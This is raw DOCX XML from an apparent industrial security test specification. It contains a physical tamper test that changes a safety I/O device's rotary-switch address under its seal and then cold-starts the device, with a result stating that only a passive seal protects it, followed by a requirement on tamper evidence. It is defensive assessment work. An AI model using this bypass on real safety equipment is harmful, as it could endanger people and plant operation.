    <w:p w14:paraId="61ACB70A" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="00EE682A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F6F00C" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="00EE682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6D5B99"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6D5B99" w:rsidRDefault="00EE682A" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BFDECA3" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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E682A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00EE682A" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0125B299" w14:textId="66EBE463" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="001606C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TC-RQ002-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D53C4" w:rsidRPr="006D5B99"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5D53C4" w:rsidRPr="006D5B99" w:rsidRDefault="005D53C4" w:rsidP="005D53C4">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BB2DA9E" w14:textId="1D19A42F" w:rsidR="005D53C4" w:rsidRPr="006D5B99" w:rsidRDefault="005D53C4" w:rsidP="005D53C4">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="185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physical, on the SRIO test unit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D53C4" w:rsidRPr="006D5B99"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5D53C4" w:rsidRPr="006D5B99" w:rsidRDefault="005D53C4" w:rsidP="005D53C4">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="489658CE" w14:textId="19C25FEE"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Online &amp; Diagnostics (read SCPU IoT: F_Dest_Address / rotary-switch value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D53C4" w:rsidRPr="006D5B99"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5D53C4" w:rsidRPr="006D5B99" w:rsidRDefault="005D53C4" w:rsidP="005D53C4">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C218AA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rotary-switch value (F_Dest_Add).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD03129"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read</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56FAB03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/devicestatus/rotary_switch (or via IoT-Core Visualizer, browser to</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A47CC6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http://192.168.0.2/ &gt; 'devicestatus' menu). Photograph the seal state.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F7A819C"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While the device is running (Operate), attempt to non-destructively</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79CB1BDB"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remove the protective sleeve/cap and change the rotary switch. </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Check</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF886C2"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whether the RUNNING F_Dest_Add changes (expected: no, only read at Init</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C56B762" w14:textId="4C261D98"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CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> SRIO-8803/10812).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25C634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Perform a cold start (disconnect the power-input cable, wait 5-10s,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FEBE0FF"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reconnect; wait until RDY LED and P LED turn green).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57235F9E"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Read the rotary-switch value again; check whether the new value is now</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03180718"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applied.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BD4DD43" w14:textId="77777777" w:rsidR="005D53C4" w:rsidRPr="006D5B99" w:rsidRDefault="005D53C4" w:rsidP="005D53C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Assess whether the manipulation was possible without visible damage to</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50F9067E" w14:textId="4039405D" w:rsidR="005D53C4" w:rsidRPr="006D5B99" w:rsidRDefault="005D53C4" w:rsidP="005D53C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seal (compare against the Step-1 photo).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D53C4" w:rsidRPr="006D5B99"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5D53C4" w:rsidRPr="006D5B99" w:rsidRDefault="005D53C4" w:rsidP="005D53C4">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="135DF254" w14:textId="73C72536" w:rsidR="005D53C4" w:rsidRPr="006D5B99" w:rsidRDefault="005D53C4" w:rsidP="005D53C4">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D57FF2D" w14:textId="77777777" w:rsidR="009315BA"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the runtime change is ignored (confirms the temporal protection); after the cold start, the altered value takes effect</w:t>
            </w:r>
            <w:r w:rsidR="009315BA" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the stored value is physically corruptible; the only resistance is the passive seal, with no active tamper detection/response</w:t>
            </w:r>
            <w:r w:rsidR="009315BA" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms resistance-only physical protection (G-3). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="162648AD" w14:textId="1CAE7F57" w:rsidR="005D53C4" w:rsidRPr="006D5B99" w:rsidRDefault="005D53C4" w:rsidP="005D53C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lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence: before/after photos, TIA screenshots.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DFECC4F" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3801796C" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F3AD28" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C91665B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7109BE1B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0FF01B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485168A6" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089A53B3" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72455161" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D9A2B36" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7510AA3B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A76B7EA" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD2E54F" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2111F429" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010C5C84" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E593DCE" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73CDF4D9" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416D789B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC21332" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FEA0B9B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F86104B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750A1216" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8024AD" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4281C0C8" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9B83DB" w14:textId="77777777" w:rsidR="00AF5111" w:rsidRDefault="00AF5111" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AAB4650" w14:textId="77777777" w:rsidR="007514E9" w:rsidRPr="006D5B99" w:rsidRDefault="007514E9" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E6DFF3" w14:textId="77777777" w:rsidR="00995F95" w:rsidRPr="006D5B99" w:rsidRDefault="00995F95" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B0C15B" w14:textId="77777777" w:rsidR="0021004D" w:rsidRPr="006D5B99" w:rsidRDefault="0021004D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795355D1" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E15FBA" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRPr="006D5B99" w:rsidRDefault="005D11F1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7228FB0F" w14:textId="7F1036E0" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293454BA"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7A33B29" w14:textId="04CD10FC" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C217AB3" w14:textId="14A20B13"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650EDB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The system shall collect evidence of any legitimate or illegitimate intervention in hardware components relevant for connection or access to safety-critical software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6CE099" w14:textId="67DC2054"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013C86" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B7973" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 2.8</w:t>
      </w:r>
      <w:r w:rsidR="001F2676" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> not directly for phy.</w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002B7973" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="005F4C5A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CR 2.9, CR 2.10, </w:t>
      </w:r>
      <w:r w:rsidR="002B7973" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 2.11,</w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B7973" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 2.12,</w:t>
      </w:r>
      <w:r w:rsidR="002B7973" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001F3ACD" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR/EDR 2.13</w:t>
      </w:r>
      <w:r w:rsidR="005F4C5A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, CR 3.9, </w:t>
      </w:r>
      <w:r w:rsidR="00650EDB" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EDR 3.11</w:t>
      </w:r>
      <w:r w:rsidR="00DB5DB0" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF11092" w14:textId="4C1B70E5" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00427EE4" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G (Physical F-address/OP-mode interface); I (Audit Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D15735A" w14:textId="6F569697"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427EE4" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Repudiation</w:t>
      </w:r>
      <w:r w:rsidR="00013C86" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E402AA" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0083659A" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Tampering</w:t>
      </w:r>
      <w:r w:rsidR="0093499E" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09674BC6" w14:textId="77777777" w:rsidR="00FD05D2"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1B134FB" w14:textId="1A6A809C"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Physical seals:  Passive plastic/metal seals (SRIO-11000/11001).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664A6BBB" w14:textId="03E5FC85"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 xml:space="preserve">Rotary </w:t>
      </w:r>
      <w:r w:rsidR="00756315" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Switch 192.168.0.91</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> read only at Init:  Runtime change ignored (SRIO-10812).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2239B034" w14:textId="2FFE9882" w:rsidR="00C025BD" w:rsidRPr="006D5B99" w:rsidRDefault="00C025BD" w:rsidP="00C025BD">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I&amp;M4 signature:  F_iParCRC + F_Par_CRC fingerprint of the loaded configuration (SRIO-3011).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3670A63A" w14:textId="3EDCB6B6" w:rsidR="006901C7" w:rsidRPr="006D5B99" w:rsidRDefault="00C025BD" w:rsidP="00C025BD">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
